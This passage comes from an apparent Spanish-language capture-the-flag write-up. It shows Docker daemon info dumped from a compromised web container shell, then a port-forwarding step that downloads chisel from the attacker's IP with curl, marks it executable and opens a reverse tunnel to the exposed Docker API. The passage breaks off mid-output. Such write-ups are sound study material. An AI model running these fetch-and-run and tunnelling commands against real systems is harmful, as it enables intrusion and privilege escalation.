class="s2">&#34;Mirrors&#34;</span>:<span class="o">[]</span>,<span class="s2">&#34;Name&#34;</span>:<span class="s2">&#34;hubproxy.docker.internal:5555&#34;</span>,<span class="s2">&#34;Official&#34;</span>:false,<span class="s2">&#34;Secure&#34;</span>:false<span class="o">}}</span>,<span class="s2">&#34;InsecureRegistryCIDRs&#34;</span>:<span class="o">[</span><span class="s2">&#34;::1/128&#34;</span>,<span class="s2">&#34;127.0.0.0/8&#34;</span><span class="o">]</span>,<span class="s2">&#34;Mirrors&#34;</span>:null<span class="o">}</span>,<span class="s2">&#34;NCPU&#34;</span>:2,<span class="s2">&#34;MemTotal&#34;</span>:1995177984,<span class="s2">&#34;GenericResources&#34;</span>:null,<span class="s2">&#34;DockerRootDir&#34;</span>:<span class="s2">&#34;/var/lib/docker&#34;</span>,<span class="s2">&#34;HttpProxy&#34;</span>:<span class="s2">&#34;http.docker.internal:3128&#34;</span>,<span class="s2">&#34;HttpsProxy&#34;</span>:<span class="s2">&#34;http.docker.internal:3128&#34;</span>,<span class="s2">&#34;NoProxy&#34;</span>:<span class="s2">&#34;hubproxy.docker.internal&#34;</span>,<span class="s2">&#34;Name&#34;</span>:<span class="s2">&#34;docker-desktop&#34;</span>,<span class="s2">&#34;Labels&#34;</span>:<span class="o">[]</span>,<span class="s2">&#34;ExperimentalBuild&#34;</span>:false,<span class="s2">&#34;ServerVersion&#34;</span>:<span class="s2">&#34;28.3.2&#34;</span>,<span class="s2">&#34;Runtimes&#34;</span>:<span class="o">{</span><span class="s2">&#34;io.containerd.runc.v2&#34;</span>:<span class="o">{</span><span class="s2">&#34;path&#34;</span>:<span class="s2">&#34;runc&#34;</span>,<span class="s2">&#34;status&#34;</span>:<span class="o">{</span><span class="s2">&#34;org.opencontainers.runtime-spec.features&#34;</span>:<span class="s2">&#34;{\&#34;ociVersionMin\&#34;:\&#34;1.0.0\&#34;,\&#34;ociVersionMax\&#34;:\&#34;1.2.0\&#34;,\&#34;hooks\&#34;:[\&#34;prestart\&#34;,\&#34;createRuntime\&#34;,\&#34;createContainer\&#34;,\&#34;startContainer\&#34;,\&#34;poststart\&#34;,\&#34;poststop\&#34;],\&#34;mountOptions\&#34;:[\&#34;async\&#34;,\&#34;atime\&#34;,\&#34;bind\&#34;,\&#34;defaults\&#34;,\&#34;dev\&#34;,\&#34;diratime\&#34;,\&#34;dirsync\&#34;,\&#34;exec\&#34;,\&#34;iversion\&#34;,\&#34;lazytime\&#34;,\&#34;loud\&#34;,\&#34;mand\&#34;,\&#34;noatime\&#34;,\&#34;nodev\&#34;,\&#34;nodiratime\&#34;,\&#34;noexec\&#34;,\&#34;noiversion\&#34;,\&#34;nolazytime\&#34;,\&#34;nomand\&#34;,\&#34;norelatime\&#34;,\&#34;nostrictatime\&#34;,\&#34;nosuid\&#34;,\&#34;nosymfollow\&#34;,\&#34;private\&#34;,\&#34;ratime\&#34;,\&#34;rbind\&#34;,\&#34;rdev\&#34;,\&#34;rdiratime\&#34;,\&#34;relatime\&#34;,\&#34;remount\&#34;,\&#34;rexec\&#34;,\&#34;rnoatime\&#34;,\&#34;rnodev\&#34;,\&#34;rnodiratime\&#34;,\&#34;rnoexec\&#34;,\&#34;rnorelatime\&#34;,\&#34;rnostrictatime\&#34;,\&#34;rnosuid\&#34;,\&#34;rnosymfollow\&#34;,\&#34;ro\&#34;,\&#34;rprivate\&#34;,\&#34;rrelatime\&#34;,\&#34;rro\&#34;,\&#34;rrw\&#34;,\&#34;rshared\&#34;,\&#34;rslave\&#34;,\&#34;rstrictatime\&#34;,\&#34;rsuid\&#34;,\&#34;rsymfollow\&#34;,\&#34;runbindable\&#34;,\&#34;rw\&#34;,\&#34;shared\&#34;,\&#34;silent\&#34;,\&#34;slave\&#34;,\&#34;strictatime\&#34;,\&#34;suid\&#34;,\&#34;symfollow\&#34;,\&#34;sync\&#34;,\&#34;tmpcopyup\&#34;,\&#34;unbindable\&#34;],\&#34;linux\&#34;:{\&#34;namespaces\&#34;:[\&#34;cgroup\&#34;,\&#34;ipc\&#34;,\&#34;mount\&#34;,\&#34;network\&#34;,\&#34;pid\&#34;,\&#34;time\&#34;,\&#34;user\&#34;,\&#34;uts\&#34;],\&#34;capabilities\&#34;:[\&#34;CAP_CHOWN\&#34;,\&#34;CAP_DAC_OVERRIDE\&#34;,\&#34;CAP_DAC_READ_SEARCH\&#34;,\&#34;CAP_FOWNER\&#34;,\&#34;CAP_FSETID\&#34;,\&#34;CAP_KILL\&#34;,\&#34;CAP_SETGID\&#34;,\&#34;CAP_SETUID\&#34;,\&#34;CAP_SETPCAP\&#34;,\&#34;CAP_LINUX_IMMUTABLE\&#34;,\&#34;CAP_NET_BIND_SERVICE\&#34;,\&#34;CAP_NET_BROADCAST\&#34;,\&#34;CAP_NET_ADMIN\&#34;,\&#34;CAP_NET_RAW\&#34;,\&#34;CAP_IPC_LOCK\&#34;,\&#34;CAP_IPC_OWNER\&#34;,\&#34;CAP_SYS_MODULE\&#34;,\&#34;CAP_SYS_RAWIO\&#34;,\&#34;CAP_SYS_CHROOT\&#34;,\&#34;CAP_SYS_PTRACE\&#34;,\&#34;CAP_SYS_PACCT\&#34;,\&#34;CAP_SYS_ADMIN\&#34;,\&#34;CAP_SYS_BOOT\&#34;,\&#34;CAP_SYS_NICE\&#34;,\&#34;CAP_SYS_RESOURCE\&#34;,\&#34;CAP_SYS_TIME\&#34;,\&#34;CAP_SYS_TTY_CONFIG\&#34;,\&#34;CAP_MKNOD\&#34;,\&#34;CAP_LEASE\&#34;,\&#34;CAP_AUDIT_WRITE\&#34;,\&#34;CAP_AUDIT_CONTROL\&#34;,\&#34;CAP_SETFCAP\&#34;,\&#34;CAP_MAC_OVERRIDE\&#34;,\&#34;CAP_MAC_ADMIN\&#34;,\&#34;CAP_SYSLOG\&#34;,\&#34;CAP_WAKE_ALARM\&#34;,\&#34;CAP_BLOCK_SUSPEND\&#34;,\&#34;CAP_AUDIT_READ\&#34;,\&#34;CAP_PERFMON\&#34;,\&#34;CAP_BPF\&#34;,\&#34;CAP_CHECKPOINT_RESTORE\&#34;],\&#34;cgroup\&#34;:{\&#34;v1\&#34;:true,\&#34;v2\&#34;:true,\&#34;systemd\&#34;:true,\&#34;systemdUser\&#34;:true,\&#34;rdma\&#34;:true},\&#34;seccomp\&#34;:{\&#34;enabled\&#34;:true,\&#34;actions\&#34;:[\&#34;SCMP_ACT_ALLOW\&#34;,\&#34;SCMP_ACT_ERRNO\&#34;,\&#34;SCMP_ACT_KILL\&#34;,\&#34;SCMP_ACT_KILL_PROCESS\&#34;,\&#34;SCMP_ACT_KILL_THREAD\&#34;,\&#34;SCMP_ACT_LOG\&#34;,\&#34;SCMP_ACT_NOTIFY\&#34;,\&#34;SCMP_ACT_TRACE\&#34;,\&#34;SCMP_ACT_TRAP\&#34;],\&#34;operators\&#34;:[\&#34;SCMP_CMP_EQ\&#34;,\&#34;SCMP_CMP_GE\&#34;,\&#34;SCMP_CMP_GT\&#34;,\&#34;SCMP_CMP_LE\&#34;,\&#34;SCMP_CMP_LT\&#34;,\&#34;SCMP_CMP_MASKED_EQ\&#34;,\&#34;SCMP_CMP_NE\&#34;],\&#34;archs\&#34;:[\&#34;SCMP_ARCH_AARCH64\&#34;,\&#34;SCMP_ARCH_ARM\&#34;,\&#34;SCMP_ARCH_MIPS\&#34;,\&#34;SCMP_ARCH_MIPS64\&#34;,\&#34;SCMP_ARCH_MIPS64N32\&#34;,\&#34;SCMP_ARCH_MIPSEL\&#34;,\&#34;SCMP_ARCH_MIPSEL64\&#34;,\&#34;SCMP_ARCH_MIPSEL64N32\&#34;,\&#34;SCMP_ARCH_PPC\&#34;,\&#34;SCMP_ARCH_PPC64\&#34;,\&#34;SCMP_ARCH_PPC64LE\&#34;,\&#34;SCMP_ARCH_RISCV64\&#34;,\&#34;SCMP_ARCH_S390\&#34;,\&#34;SCMP_ARCH_S390X\&#34;,\&#34;SCMP_ARCH_X32\&#34;,\&#34;SCMP_ARCH_X86\&#34;,\&#34;SCMP_ARCH_X86_64\&#34;],\&#34;knownFlags\&#34;:[\&#34;SECCOMP_FILTER_FLAG_TSYNC\&#34;,\&#34;SECCOMP_FILTER_FLAG_SPEC_ALLOW\&#34;,\&#34;SECCOMP_FILTER_FLAG_LOG\&#34;],\&#34;supportedFlags\&#34;:[\&#34;SECCOMP_FILTER_FLAG_TSYNC\&#34;,\&#34;SECCOMP_FILTER_FLAG_SPEC_ALLOW\&#34;,\&#34;SECCOMP_FILTER_FLAG_LOG\&#34;]},\&#34;apparmor\&#34;:{\&#34;enabled\&#34;:true},\&#34;selinux\&#34;:{\&#34;enabled\&#34;:true},\&#34;intelRdt\&#34;:{\&#34;enabled\&#34;:true},\&#34;mountExtensions\&#34;:{\&#34;idmap\&#34;:{\&#34;enabled\&#34;:true}}},\&#34;annotations\&#34;:{\&#34;io.github.seccomp.libseccomp.version\&#34;:\&#34;2.5.4\&#34;,\&#34;org.opencontainers.runc.checkpoint.enabled\&#34;:\&#34;true\&#34;,\&#34;org.opencontainers.runc.commit\&#34;:\&#34;v1.2.5-0-g59923ef\&#34;,\&#34;org.opencontainers.runc.version\&#34;:\&#34;1.2.5\&#34;},\&#34;potentiallyUnsafeConfigAnnotations\&#34;:[\&#34;bundle\&#34;,\&#34;org.systemd.property.\&#34;,\&#34;org.criu.config\&#34;]}&#34;</span><span class="o">}}</span>,<span class="s2">&#34;nvidia&#34;</span>:<span class="o">{</span><span class="s2">&#34;path&#34;</span>:<span class="s2">&#34;nvidia-container-runtime&#34;</span>,<span class="s2">&#34;status&#34;</span>:<span class="o">{</span><span class="s2">&#34;org.opencontainers.runtime-spec.features&#34;</span>:<span class="s2">&#34;{\&#34;ociVersionMin\&#34;:\&#34;1.0.0\&#34;,\&#34;ociVersionMax\&#34;:\&#34;1.2.0\&#34;,\&#34;hooks\&#34;:[\&#34;prestart\&#34;,\&#34;createRuntime\&#34;,\&#34;createContainer\&#34;,\&#34;startContainer\&#34;,\&#34;poststart\&#34;,\&#34;poststop\&#34;],\&#34;mountOptions\&#34;:[\&#34;async\&#34;,\&#34;atime\&#34;,\&#34;bind\&#34;,\&#34;defaults\&#34;,\&#34;dev\&#34;,\&#34;diratime\&#34;,\&#34;dirsync\&#34;,\&#34;exec\&#34;,\&#34;iversion\&#34;,\&#34;lazytime\&#34;,\&#34;loud\&#34;,\&#34;mand\&#34;,\&#34;noatime\&#34;,\&#34;nodev\&#34;,\&#34;nodiratime\&#34;,\&#34;noexec\&#34;,\&#34;noiversion\&#34;,\&#34;nolazytime\&#34;,\&#34;nomand\&#34;,\&#34;norelatime\&#34;,\&#34;nostrictatime\&#34;,\&#34;nosuid\&#34;,\&#34;nosymfollow\&#34;,\&#34;private\&#34;,\&#34;ratime\&#34;,\&#34;rbind\&#34;,\&#34;rdev\&#34;,\&#34;rdiratime\&#34;,\&#34;relatime\&#34;,\&#34;remount\&#34;,\&#34;rexec\&#34;,\&#34;rnoatime\&#34;,\&#34;rnodev\&#34;,\&#34;rnodiratime\&#34;,\&#34;rnoexec\&#34;,\&#34;rnorelatime\&#34;,\&#34;rnostrictatime\&#34;,\&#34;rnosuid\&#34;,\&#34;rnosymfollow\&#34;,\&#34;ro\&#34;,\&#34;rprivate\&#34;,\&#34;rrelatime\&#34;,\&#34;rro\&#34;,\&#34;rrw\&#34;,\&#34;rshared\&#34;,\&#34;rslave\&#34;,\&#34;rstrictatime\&#34;,\&#34;rsuid\&#34;,\&#34;rsymfollow\&#34;,\&#34;runbindable\&#34;,\&#34;rw\&#34;,\&#34;shared\&#34;,\&#34;silent\&#34;,\&#34;slave\&#34;,\&#34;strictatime\&#34;,\&#34;suid\&#34;,\&#34;symfollow\&#34;,\&#34;sync\&#34;,\&#34;tmpcopyup\&#34;,\&#34;unbindable\&#34;],\&#34;linux\&#34;:{\&#34;namespaces\&#34;:[\&#34;cgroup\&#34;,\&#34;ipc\&#34;,\&#34;mount\&#34;,\&#34;network\&#34;,\&#34;pid\&#34;,\&#34;time\&#34;,\&#34;user\&#34;,\&#34;uts\&#34;],\&#34;capabilities\&#34;:[\&#34;CAP_CHOWN\&#34;,\&#34;CAP_DAC_OVERRIDE\&#34;,\&#34;CAP_DAC_READ_SEARCH\&#34;,\&#34;CAP_FOWNER\&#34;,\&#34;CAP_FSETID\&#34;,\&#34;CAP_KILL\&#34;,\&#34;CAP_SETGID\&#34;,\&#34;CAP_SETUID\&#34;,\&#34;CAP_SETPCAP\&#34;,\&#34;CAP_LINUX_IMMUTABLE\&#34;,\&#34;CAP_NET_BIND_SERVICE\&#34;,\&#34;CAP_NET_BROADCAST\&#34;,\&#34;CAP_NET_ADMIN\&#34;,\&#34;CAP_NET_RAW\&#34;,\&#34;CAP_IPC_LOCK\&#34;,\&#34;CAP_IPC_OWNER\&#34;,\&#34;CAP_SYS_MODULE\&#34;,\&#34;CAP_SYS_RAWIO\&#34;,\&#34;CAP_SYS_CHROOT\&#34;,\&#34;CAP_SYS_PTRACE\&#34;,\&#34;CAP_SYS_PACCT\&#34;,\&#34;CAP_SYS_ADMIN\&#34;,\&#34;CAP_SYS_BOOT\&#34;,\&#34;CAP_SYS_NICE\&#34;,\&#34;CAP_SYS_RESOURCE\&#34;,\&#34;CAP_SYS_TIME\&#34;,\&#34;CAP_SYS_TTY_CONFIG\&#34;,\&#34;CAP_MKNOD\&#34;,\&#34;CAP_LEASE\&#34;,\&#34;CAP_AUDIT_WRITE\&#34;,\&#34;CAP_AUDIT_CONTROL\&#34;,\&#34;CAP_SETFCAP\&#34;,\&#34;CAP_MAC_OVERRIDE\&#34;,\&#34;CAP_MAC_ADMIN\&#34;,\&#34;CAP_SYSLOG\&#34;,\&#34;CAP_WAKE_ALARM\&#34;,\&#34;CAP_BLOCK_SUSPEND\&#34;,\&#34;CAP_AUDIT_READ\&#34;,\&#34;CAP_PERFMON\&#34;,\&#34;CAP_BPF\&#34;,\&#34;CAP_CHECKPOINT_RESTORE\&#34;],\&#34;cgroup\&#34;:{\&#34;v1\&#34;:true,\&#34;v2\&#34;:true,\&#34;systemd\&#34;:true,\&#34;systemdUser\&#34;:true,\&#34;rdma\&#34;:true},\&#34;seccomp\&#34;:{\&#34;enabled\&#34;:true,\&#34;actions\&#34;:[\&#34;SCMP_ACT_ALLOW\&#34;,\&#34;SCMP_ACT_ERRNO\&#34;,\&#34;SCMP_ACT_KILL\&#34;,\&#34;SCMP_ACT_KILL_PROCESS\&#34;,\&#34;SCMP_ACT_KILL_THREAD\&#34;,\&#34;SCMP_ACT_LOG\&#34;,\&#34;SCMP_ACT_NOTIFY\&#34;,\&#34;SCMP_ACT_TRACE\&#34;,\&#34;SCMP_ACT_TRAP\&#34;],\&#34;operators\&#34;:[\&#34;SCMP_CMP_EQ\&#34;,\&#34;SCMP_CMP_GE\&#34;,\&#34;SCMP_CMP_GT\&#34;,\&#34;SCMP_CMP_LE\&#34;,\&#34;SCMP_CMP_LT\&#34;,\&#34;SCMP_CMP_MASKED_EQ\&#34;,\&#34;SCMP_CMP_NE\&#34;],\&#34;archs\&#34;:[\&#34;SCMP_ARCH_AARCH64\&#34;,\&#34;SCMP_ARCH_ARM\&#34;,\&#34;SCMP_ARCH_MIPS\&#34;,\&#34;SCMP_ARCH_MIPS64\&#34;,\&#34;SCMP_ARCH_MIPS64N32\&#34;,\&#34;SCMP_ARCH_MIPSEL\&#34;,\&#34;SCMP_ARCH_MIPSEL64\&#34;,\&#34;SCMP_ARCH_MIPSEL64N32\&#34;,\&#34;SCMP_ARCH_PPC\&#34;,\&#34;SCMP_ARCH_PPC64\&#34;,\&#34;SCMP_ARCH_PPC64LE\&#34;,\&#34;SCMP_ARCH_RISCV64\&#34;,\&#34;SCMP_ARCH_S390\&#34;,\&#34;SCMP_ARCH_S390X\&#34;,\&#34;SCMP_ARCH_X32\&#34;,\&#34;SCMP_ARCH_X86\&#34;,\&#34;SCMP_ARCH_X86_64\&#34;],\&#34;knownFlags\&#34;:[\&#34;SECCOMP_FILTER_FLAG_TSYNC\&#34;,\&#34;SECCOMP_FILTER_FLAG_SPEC_ALLOW\&#34;,\&#34;SECCOMP_FILTER_FLAG_LOG\&#34;],\&#34;supportedFlags\&#34;:[\&#34;SECCOMP_FILTER_FLAG_TSYNC\&#34;,\&#34;SECCOMP_FILTER_FLAG_SPEC_ALLOW\&#34;,\&#34;SECCOMP_FILTER_FLAG_LOG\&#34;]},\&#34;apparmor\&#34;:{\&#34;enabled\&#34;:true},\&#34;selinux\&#34;:{\&#34;enabled\&#34;:true},\&#34;intelRdt\&#34;:{\&#34;enabled\&#34;:true},\&#34;mountExtensions\&#34;:{\&#34;idmap\&#34;:{\&#34;enabled\&#34;:true}}},\&#34;annotations\&#34;:{\&#34;io.github.seccomp.libseccomp.version\&#34;:\&#34;2.5.4\&#34;,\&#34;org.opencontainers.runc.checkpoint.enabled\&#34;:\&#34;true\&#34;,\&#34;org.opencontainers.runc.commit\&#34;:\&#34;v1.2.5-0-g59923ef\&#34;,\&#34;org.opencontainers.runc.version\&#34;:\&#34;1.2.5\&#34;},\&#34;potentiallyUnsafeConfigAnnotations\&#34;:[\&#34;bundle\&#34;,\&#34;org.systemd.property.\&#34;,\&#34;org.criu.config\&#34;]}&#34;</span><span class="o">}}</span>,<span class="s2">&#34;runc&#34;</span>:<span class="o">{</span><span class="s2">&#34;path&#34;</span>:<span class="s2">&#34;runc&#34;</span>,<span class="s2">&#34;status&#34;</span>:<span class="o">{</span><span class="s2">&#34;org.opencontainers.runtime-spec.features&#34;</span>:<span class="s2">&#34;{\&#34;ociVersionMin\&#34;:\&#34;1.0.0\&#34;,\&#34;ociVersionMax\&#34;:\&#34;1.2.0\&#34;,\&#34;hooks\&#34;:[\&#34;prestart\&#34;,\&#34;createRuntime\&#34;,\&#34;createContainer\&#34;,\&#34;startContainer\&#34;,\&#34;poststart\&#34;,\&#34;poststop\&#34;],\&#34;mountOptions\&#34;:[\&#34;async\&#34;,\&#34;atime\&#34;,\&#34;bind\&#34;,\&#34;defaults\&#34;,\&#34;dev\&#34;,\&#34;diratime\&#34;,\&#34;dirsync\&#34;,\&#34;exec\&#34;,\&#34;iversion\&#34;,\&#34;lazytime\&#34;,\&#34;loud\&#34;,\&#34;mand\&#34;,\&#34;noatime\&#34;,\&#34;nodev\&#34;,\&#34;nodiratime\&#34;,\&#34;noexec\&#34;,\&#34;noiversion\&#34;,\&#34;nolazytime\&#34;,\&#34;nomand\&#34;,\&#34;norelatime\&#34;,\&#34;nostrictatime\&#34;,\&#34;nosuid\&#34;,\&#34;nosymfollow\&#34;,\&#34;private\&#34;,\&#34;ratime\&#34;,\&#34;rbind\&#34;,\&#34;rdev\&#34;,\&#34;rdiratime\&#34;,\&#34;relatime\&#34;,\&#34;remount\&#34;,\&#34;rexec\&#34;,\&#34;rnoatime\&#34;,\&#34;rnodev\&#34;,\&#34;rnodiratime\&#34;,\&#34;rnoexec\&#34;,\&#34;rnorelatime\&#34;,\&#34;rnostrictatime\&#34;,\&#34;rnosuid\&#34;,\&#34;rnosymfollow\&#34;,\&#34;ro\&#34;,\&#34;rprivate\&#34;,\&#34;rrelatime\&#34;,\&#34;rro\&#34;,\&#34;rrw\&#34;,\&#34;rshared\&#34;,\&#34;rslave\&#34;,\&#34;rstrictatime\&#34;,\&#34;rsuid\&#34;,\&#34;rsymfollow\&#34;,\&#34;runbindable\&#34;,\&#34;rw\&#34;,\&#34;shared\&#34;,\&#34;silent\&#34;,\&#34;slave\&#34;,\&#34;strictatime\&#34;,\&#34;suid\&#34;,\&#34;symfollow\&#34;,\&#34;sync\&#34;,\&#34;tmpcopyup\&#34;,\&#34;unbindable\&#34;],\&#34;linux\&#34;:{\&#34;namespaces\&#34;:[\&#34;cgroup\&#34;,\&#34;ipc\&#34;,\&#34;mount\&#34;,\&#34;network\&#34;,\&#34;pid\&#34;,\&#34;time\&#34;,\&#34;user\&#34;,\&#34;uts\&#34;],\&#34;capabilities\&#34;:[\&#34;CAP_CHOWN\&#34;,\&#34;CAP_DAC_OVERRIDE\&#34;,\&#34;CAP_DAC_READ_SEARCH\&#34;,\&#34;CAP_FOWNER\&#34;,\&#34;CAP_FSETID\&#34;,\&#34;CAP_KILL\&#34;,\&#34;CAP_SETGID\&#34;,\&#34;CAP_SETUID\&#34;,\&#34;CAP_SETPCAP\&#34;,\&#34;CAP_LINUX_IMMUTABLE\&#34;,\&#34;CAP_NET_BIND_SERVICE\&#34;,\&#34;CAP_NET_BROADCAST\&#34;,\&#34;CAP_NET_ADMIN\&#34;,\&#34;CAP_NET_RAW\&#34;,\&#34;CAP_IPC_LOCK\&#34;,\&#34;CAP_IPC_OWNER\&#34;,\&#34;CAP_SYS_MODULE\&#34;,\&#34;CAP_SYS_RAWIO\&#34;,\&#34;CAP_SYS_CHROOT\&#34;,\&#34;CAP_SYS_PTRACE\&#34;,\&#34;CAP_SYS_PACCT\&#34;,\&#34;CAP_SYS_ADMIN\&#34;,\&#34;CAP_SYS_BOOT\&#34;,\&#34;CAP_SYS_NICE\&#34;,\&#34;CAP_SYS_RESOURCE\&#34;,\&#34;CAP_SYS_TIME\&#34;,\&#34;CAP_SYS_TTY_CONFIG\&#34;,\&#34;CAP_MKNOD\&#34;,\&#34;CAP_LEASE\&#34;,\&#34;CAP_AUDIT_WRITE\&#34;,\&#34;CAP_AUDIT_CONTROL\&#34;,\&#34;CAP_SETFCAP\&#34;,\&#34;CAP_MAC_OVERRIDE\&#34;,\&#34;CAP_MAC_ADMIN\&#34;,\&#34;CAP_SYSLOG\&#34;,\&#34;CAP_WAKE_ALARM\&#34;,\&#34;CAP_BLOCK_SUSPEND\&#34;,\&#34;CAP_AUDIT_READ\&#34;,\&#34;CAP_PERFMON\&#34;,\&#34;CAP_BPF\&#34;,\&#34;CAP_CHECKPOINT_RESTORE\&#34;],\&#34;cgroup\&#34;:{\&#34;v1\&#34;:true,\&#34;v2\&#34;:true,\&#34;systemd\&#34;:true,\&#34;systemdUser\&#34;:true,\&#34;rdma\&#34;:true},\&#34;seccomp\&#34;:{\&#34;enabled\&#34;:true,\&#34;actions\&#34;:[\&#34;SCMP_ACT_ALLOW\&#34;,\&#34;SCMP_ACT_ERRNO\&#34;,\&#34;SCMP_ACT_KILL\&#34;,\&#34;SCMP_ACT_KILL_PROCESS\&#34;,\&#34;SCMP_ACT_KILL_THREAD\&#34;,\&#34;SCMP_ACT_LOG\&#34;,\&#34;SCMP_ACT_NOTIFY\&#34;,\&#34;SCMP_ACT_TRACE\&#34;,\&#34;SCMP_ACT_TRAP\&#34;],\&#34;operators\&#34;:[\&#34;SCMP_CMP_EQ\&#34;,\&#34;SCMP_CMP_GE\&#34;,\&#34;SCMP_CMP_GT\&#34;,\&#34;SCMP_CMP_LE\&#34;,\&#34;SCMP_CMP_LT\&#34;,\&#34;SCMP_CMP_MASKED_EQ\&#34;,\&#34;SCMP_CMP_NE\&#34;],\&#34;archs\&#34;:[\&#34;SCMP_ARCH_AARCH64\&#34;,\&#34;SCMP_ARCH_ARM\&#34;,\&#34;SCMP_ARCH_MIPS\&#34;,\&#34;SCMP_ARCH_MIPS64\&#34;,\&#34;SCMP_ARCH_MIPS64N32\&#34;,\&#34;SCMP_ARCH_MIPSEL\&#34;,\&#34;SCMP_ARCH_MIPSEL64\&#34;,\&#34;SCMP_ARCH_MIPSEL64N32\&#34;,\&#34;SCMP_ARCH_PPC\&#34;,\&#34;SCMP_ARCH_PPC64\&#34;,\&#34;SCMP_ARCH_PPC64LE\&#34;,\&#34;SCMP_ARCH_RISCV64\&#34;,\&#34;SCMP_ARCH_S390\&#34;,\&#34;SCMP_ARCH_S390X\&#34;,\&#34;SCMP_ARCH_X32\&#34;,\&#34;SCMP_ARCH_X86\&#34;,\&#34;SCMP_ARCH_X86_64\&#34;],\&#34;knownFlags\&#34;:[\&#34;SECCOMP_FILTER_FLAG_TSYNC\&#34;,\&#34;SECCOMP_FILTER_FLAG_SPEC_ALLOW\&#34;,\&#34;SECCOMP_FILTER_FLAG_LOG\&#34;],\&#34;supportedFlags\&#34;:[\&#34;SECCOMP_FILTER_FLAG_TSYNC\&#34;,\&#34;SECCOMP_FILTER_FLAG_SPEC_ALLOW\&#34;,\&#34;SECCOMP_FILTER_FLAG_LOG\&#34;]},\&#34;apparmor\&#34;:{\&#34;enabled\&#34;:true},\&#34;selinux\&#34;:{\&#34;enabled\&#34;:true},\&#34;intelRdt\&#34;:{\&#34;enabled\&#34;:true},\&#34;mountExtensions\&#34;:{\&#34;idmap\&#34;:{\&#34;enabled\&#34;:true}}},\&#34;annotations\&#34;:{\&#34;io.github.seccomp.libseccomp.version\&#34;:\&#34;2.5.4\&#34;,\&#34;org.opencontainers.runc.checkpoint.enabled\&#34;:\&#34;true\&#34;,\&#34;org.opencontainers.runc.commit\&#34;:\&#34;v1.2.5-0-g59923ef\&#34;,\&#34;org.opencontainers.runc.version\&#34;:\&#34;1.2.5\&#34;},\&#34;potentiallyUnsafeConfigAnnotations\&#34;:[\&#34;bundle\&#34;,\&#34;org.systemd.property.\&#34;,\&#34;org.criu.config\&#34;]}&#34;</span><span class="o">}}}</span>,<span class="s2">&#34;DefaultRuntime&#34;</span>:<span class="s2">&#34;runc&#34;</span>,<span class="s2">&#34;Swarm&#34;</span>:<span class="o">{</span><span class="s2">&#34;NodeID&#34;</span>:<span class="s2">&#34;&#34;</span>,<span class="s2">&#34;NodeAddr&#34;</span>:<span class="s2">&#34;&#34;</span>,<span class="s2">&#34;LocalNodeState&#34;</span>:<span class="s2">&#34;inactive&#34;</span>,<span class="s2">&#34;ControlAvailable&#34;</span>:false,<span class="s2">&#34;Error&#34;</span>:<span class="s2">&#34;&#34;</span>,<span class="s2">&#34;RemoteManagers&#34;</span>:null<span class="o">}</span>,<span class="s2">&#34;LiveRestoreEnabled&#34;</span>:false,<span class="s2">&#34;Isolation&#34;</span>:<span class="s2">&#34;&#34;</span>,<span class="s2">&#34;InitBinary&#34;</span>:<span class="s2">&#34;docker-init&#34;</span>,<span class="s2">&#34;ContainerdCommit&#34;</span>:<span class="o">{</span><span class="s2">&#34;ID&#34;</span>:<span class="s2">&#34;05044ec0a9a75232cad458027ca83437aae3f4da&#34;</span><span class="o">}</span>,<span class="s2">&#34;RuncCommit&#34;</span>:<span class="o">{</span><span class="s2">&#34;ID&#34;</span>:<span class="s2">&#34;v1.2.5-0-g59923ef&#34;</span><span class="o">}</span>,<span class="s2">&#34;InitCommit&#34;</span>:<span class="o">{</span><span class="s2">&#34;ID&#34;</span>:<span class="s2">&#34;de40ad0&#34;</span><span class="o">}</span>,<span class="s2">&#34;SecurityOptions&#34;</span>:<span class="o">[</span><span class="s2">&#34;name=seccomp,profile=builtin&#34;</span>,<span class="s2">&#34;name=cgroupns&#34;</span><span class="o">]</span>,<span class="s2">&#34;FirewallBackend&#34;</span>:<span class="o">{</span><span class="s2">&#34;Driver&#34;</span>:<span class="s2">&#34;iptables&#34;</span><span class="o">}</span>,<span class="s2">&#34;CDISpecDirs&#34;</span>:<span class="o">[</span><span class="s2">&#34;/etc/cdi&#34;</span>,<span class="s2">&#34;/var/run/cdi&#34;</span><span class="o">]</span>,<span class="s2">&#34;DiscoveredDevices&#34;</span>:<span class="o">[{</span><span class="s2">&#34;Source&#34;</span>:<span class="s2">&#34;cdi&#34;</span>,<span class="s2">&#34;ID&#34;</span>:<span class="s2">&#34;docker.com/gpu=webgpu&#34;</span><span class="o">}]</span>,<span class="s2">&#34;Containerd&#34;</span>:<span class="o">{</span><span class="s2">&#34;Address&#34;</span>:<span class="s2">&#34;/run/containerd/containerd.sock&#34;</span>,<span class="s2">&#34;Namespaces&#34;</span>:<span class="o">{</span><span class="s2">&#34;Containers&#34;</span>:<span class="s2">&#34;moby&#34;</span>,<span class="s2">&#34;Plugins&#34;</span>:<span class="s2">&#34;plugins.moby&#34;</span><span class="o">}}</span>,<span class="s2">&#34;Warnings&#34;</span>:<span class="o">[</span><span class="s2">&#34;WARNING: DOCKER_INSECURE_NO_IPTABLES_RAW is set&#34;</span><span class="o">]}</span> </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/html/cacti$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="port-forwarding">Port Forwarding</h2> <p>Ralizamos port forwarding para obtener el puerto e IP localmente con Chisel.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@821fbd6a43fa:/tmp/tmp$ curl 10.10.14.26/chisel_linux -o chisel<span class="p">;</span> chmod +x chisel </span></span><span class="line"><span class="cl">&lt;10.10.14.26/chisel_linux -o chisel<span class="p">;</span> chmod +x chisel </span></span><span class="line"><span class="cl"> % Total % Received % Xferd Average Speed Time Time Time Current </span></span><span class="line"><span class="cl"> Dload Upload Total Spent Left Speed </span></span><span class="line"><span class="cl"><span class="m">100</span> 9.7M <span class="m">100</span> 9.7M <span class="m">0</span> <span class="m">0</span> 2876k <span class="m">0</span> 0:00:03 0:00:03 --:--:-- 2876k </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:/tmp/tmp$ ./chisel client 10.10.14.26:7070 R:2375:192.168.65.7:2375 </span></span><span class="line"><span class="cl">&lt;el client 10.10.14.26:7070 R:2375:192.168.65.7:2375 </span></span><span class="line"><span class="cl">2025/12/07 05:46:42 client: Connecting to 